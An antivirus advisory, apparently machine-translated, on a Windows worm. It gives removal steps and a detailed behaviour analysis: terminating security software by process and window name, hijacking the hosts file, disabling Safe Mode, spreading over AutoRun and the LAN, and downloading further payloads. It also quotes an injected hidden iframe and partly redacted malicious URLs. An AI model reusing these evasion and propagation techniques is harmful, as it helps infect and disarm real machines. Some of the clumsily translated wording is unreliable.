Worm: Net-Worm.Win32.AutoRun.b

Risk level: Medium

virus Description

The sample is to use the “C / C prepared by the worm, the size of” 56,072 “bytes, the virus extension” exe “, mainly through the” file bundle “,” download tool download “,” removable memory infected “,” LAN infection “, etc., the viruses infected the LAN main purpose is to create networks.
After the user’s computer was infected, there will be security software soft kill without reason quit the antivirus can not open the window, the system is running Slow, can not enter safe mode, system restore, can not be.

Infected OS

Windows 2000/Windows XP / Windows 2003/Windows Vista / Windows 7

Transmission

Paper bound, hanging Ma page, download tools to download, mobile memory infection, infection of LAN

Manual Solution:

1, manually end the process ini.exe
2, manually delete the following files:
% SystemRoot% \ programs \ fuckme.vbs
% SystemRoot% \ programs \ wsock32.dll
% SystemRoot% \ Tasks \ install. Bat
% Temp% \ configmon.dat
% SystemDriver% \ __default.pif
% SystemRoot% \ programs \ ini.exe
% SystemRoot% \ programs \ desktop.ini
3, removal of all folders under the wsock32.dll, and normal wsock32.dll copied to the path:% SystemRoot% \ system32 \ wsock32.dll
4, with normal hosts file to replace the current hosts file, the location is% SystemRoot% \ system32 \ drivers \ etc \ hosts
5, edit all the pages document, find one and delete the following string:
<iframe src=http://www.xx.cn/1.htm width=0 height=0> </ iframe>
6, delete all the compressed files in the “install. Bat”
7, if already infected U disk, then shut down the system automatically plays, open U disk, delete the following files:
X: \ AUTORUN.INF (X as a removable storage drive letter)
X: \ recycle. (645FF040-5081-101B-9F08-00AA002F954E) \ ini.exe (X as a removable storage drive letter)
8, delete the following Registry key:
SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ (H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK)
9, the normal import the following registry value to registry key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows Script Host \ Settings
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \ AFD
KHEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Minimal \
10, need to return under the boot entry, the corresponding registry key is:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run

Variable declaration:

% SystemDriver% system where the partition, typically “C: \”
% SystemRoot% WINDODWS directory, usually “C: \ Windows”
% Documents and Settings% user documentation directory, usually “C: \ Documents and Settings”
% Temp% temp folder, usually “C: \ Documents and Settings \ current user name \ Local Settings \ Temp”
% ProgramFiles% system program default installation directory, typically: “C: \ ProgramFiles”

Virus Analysis

(1) Kaspersky virus program with a forged digital signature (digital signature is invalid), an attempt to confuse the user.
(2) virus to create the directory% SystemRoot% \ programs \, and new procedures in the directory ini.exe, after running the program.
(3) in the% SystemRoot% \ programs \ directory, create a document as an infection marker desktop.ini. Upon completion of the command line to delete their own calls.
(4)% SystemRoot% \ programs \ ini.exe created called “shors1.3″ The exclusive content, so as not to repeat the run.
(5) create a thread, the process of establishing the message loop repeatedly traverse the list. Once the list of processes found in the name of the following process is to send the close command: “safeboxTray.exe” “360Safe.exe” “360safebox.exe” “360tray.exe” “Iparmor.exe” “WEBSCANX.EXE” “TBSCAN.EXE “” TrojanHunter.exe “” THGUARD.EXE “” FWMon.exe “” mmsk.exe “” vptray.exe “” kav32.exe “” kwatch.exe “” kavstart.exe “” kissvc.exe “” kasmain.exe “” RavLite.exe “” RavMon.exe “” CCenter.exe “” UlibCfg.exe “” RavMonD.exe “” RavTask.exe “” FileDsty.exe “” EGHOST.EXE “” Navapw32.exe “” rfwsrv.exe “” rfwmain.exe “” rfwproxy.exe ”
(6) create a thread, set up a message loop repeatedly view the window title. Once found the following in the window title window title name is to send the close command: “Antivirus” “worm” “Kaspersky” “super patrol” “Jiangmin” “offline update,” “Gold Mountain” “Anti” ” anti “” Virus “” virus “” Firewall “” test “” Mcafee “” virus “” killing, “” spy Sword “” Firewall, “” active defense “,” micro-point “” defense “,” System Protection “,” Green Eagle ” “Active”, “kill the horse,” “trojan,” “infected” “Eliminator” “report” “report” “report” “Rising”, “process” “process” “system security” “Process” “NOD32″ “intercept” the “back door “” Control, “” security guards “” monitor only kill ”
(7) to create threads, repeatedly find the top of the window title, if found “IceSword” is close to the window to send a message.
(8) to create threads, repeatedly traversing the corresponding drive letter and obtain the properties. Once a removable memory, they are created in the root directory X: \ AUTORUN.INF (X as a removable storage drive letter). At the same time create a folder X: \ recycle. (645FF040-5081-101B-9F08-00AA002F954E) \, and the folder to the Recycle Bin camouflage. Upon completion, set the properties of both read-only system for the Hidden.
(9) virus will copy itself to X: \ recycle. (645FF040-5081-101B-9F08-00AA002F954E) \ ini.exe (X as a removable storage drive letter). AUTORUN.INF mounted in the system when the removable memory automatically recycle. (645FF040-5081-101B-9F08-00AA002F954E) in ini.exe.
(10) to create threads, set up a message loop. Remove script settings item, the corresponding registry key is:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows Script Host \ Settings
Repeatedly to delete, create registry entries, will be% SystemRoot% \ programs \ fuckme.vbs load to boot. At the same time to create the corresponding VBS script:% SystemRoot% \ programs \ fuckme.vbs, the script will execute% SystemRoot% \ programs \ ini.exe, the corresponding registry value:
SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ (H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK)
Name: stubpath
Value:% windir% \ programs \ fuckme.vbs
(11) New dynamic link library file% SystemRoot% \ programs \ wsock32.dll
(12) to create threads, traversing and C than A disk drive outside the two-letter all the documents under the letter, look for the extension “html” “htm” “asp” “aspx” “php” “jsp” page document, Once embedded in the one page element is not visible, point to hang horse website. At the same time to find extension “gho” “GHO” “Gho” The Ghost restore file, if found to be immediately removed to prevent the user to restore the system.
(13) to create threads, set up news cycle, followed by search all LAN IP address of the same network segment, try to connect through weak passwords on other computers within a local area network, and attempts to copy itself to kav32.exe for the name to the target computer’s shared folder and C, D, E, F 4 drive root directory. If successful, Zeyi hidden windows remotely run the program, other machines within the LAN infection.
(14) to create threads, access to the system path. To copy itself to the system under the Scheduled Tasks folder and rename:% SystemRoot% \ Tasks \ install. Bat. In addition to A and C traverse the disk drive outside the two-letter all the documents under the letter, look for extension “rar” “zip” “tgz” “cab” “tar” compression package, once found, then call the WinRAR command line% SystemRoot% \ Tasks \ install. bat added to the compressed package
(15) to create threads, from the designated website to download the virus to local and stored as% Temp% \ configmon.dat. After successfully running the program.
(16) to create threads, traversing all the folders C drive, and% SystemRoot% \ programs \ wsock32.dll copied to a folder for each directory, to replace the normal system files.
(17) to create threads, repeated from the designated website to download the virus, and stored as% SystemDriver% \ __default.pif. After successfully running the program.
(18) to create threads, modify the hosts file, shielding may be given the following security software or security support Web site: “360.qihoo.com” “qihoo.com” “www.qihoo.com” “www.qihoo.cn” “124.40 .51.17 “” 58.17.236.92 “” www.kaspersky.com “” 60.210.176.251 “” www.cnnod32.cn “” www.lanniao.org “” www.nod32club.com “” www.dswlab.com “” bbs . sucop.com “” www.virustotal.com “” tool.ikaka.com “” www.jiangmin.com “” www.duba.net “” www.eset.com.cn “” www.nod32.com “” shadu.duba.net “” union.kingsoft.com “” www.kaspersky.com.cn “” kaspersky.com.cn “” virustotal.com “” www.360.cn “” www.360safe.cn “” www .360 safe.com “” www.chinakv.com “” www.rising.com.cn “” rising.com.cn “” dl.jiangmin.com “” jiangmin.com ”
(19) to create threads, set up a message loop. Clear the system temporary folder% Temp% \ and help files plus% SystemRoot% \ help \. Empty the boot entry, to prevent security software boot. The corresponding registry key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run \
(20) to establish an infinite loop, repeatedly clear the security startup registry entry to prevent the user to enter safe mode, registry entries to be cleared as follows:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Minimal \

The virus creates a file:

% SystemRoot% \ programs \ ini.exe
% SystemRoot% \ programs \ desktop.ini
X: \ AUTORUN.INF (X as a removable storage drive letter)
X: \ recycle. (645FF040-5081-101B-9F08-00AA002F954E) \ ini.exe (X as a removable storage drive letter)
% SystemRoot% \ programs \ fuckme.vbs
% SystemRoot% \ programs \ wsock32.dll
% SystemRoot% \ Tasks \ install. Bat
% Temp% \ configmon.dat
% SystemDriver% \ __default.pif

Viruses modify the file:

% SystemRoot% \ system32 \ drivers \ etc \ hosts

Virus to create the registry:

SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ (H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK)

Virus delete the registry:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows Script Host \ Settings
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \ AFD
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run \ (is empty)
KHEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Network \ (is empty)
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot \ Minimal \ (is empty)

Virus access to the network:

http://www .***. cn/1.htm
http://180 .***. 222.137/1.exe
http://180 .***. 222.137/360safe.exe